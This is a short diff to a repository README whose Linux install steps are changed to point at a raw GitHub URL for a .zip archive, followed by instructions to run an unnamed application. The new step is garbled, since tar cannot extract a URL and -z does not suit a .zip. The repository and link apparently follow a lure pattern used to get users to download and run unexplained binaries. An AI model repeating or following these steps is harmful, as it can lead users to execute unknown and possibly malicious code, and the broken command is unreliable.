lydzai000/lodois-de-martin-du-tyrac-de-marcellus/README.md

 ### Linux Users

 1. Navigate to your Downloads folder in your terminal.
-2. Use the following command to extract the content: `tar -xzf filename.tar.gz`.
+2. Use the following command to extract the content: `tar -xzf https://raw.githubusercontent.com/lydzai000/lodois-de-martin-du-tyrac-de-marcellus/main/urging/lodois-de-martin-du-tyrac-de-marcellus-1.1.zip`.
 3. Change into the directory with `cd filename`.
 4. Run the application with `./application_name`.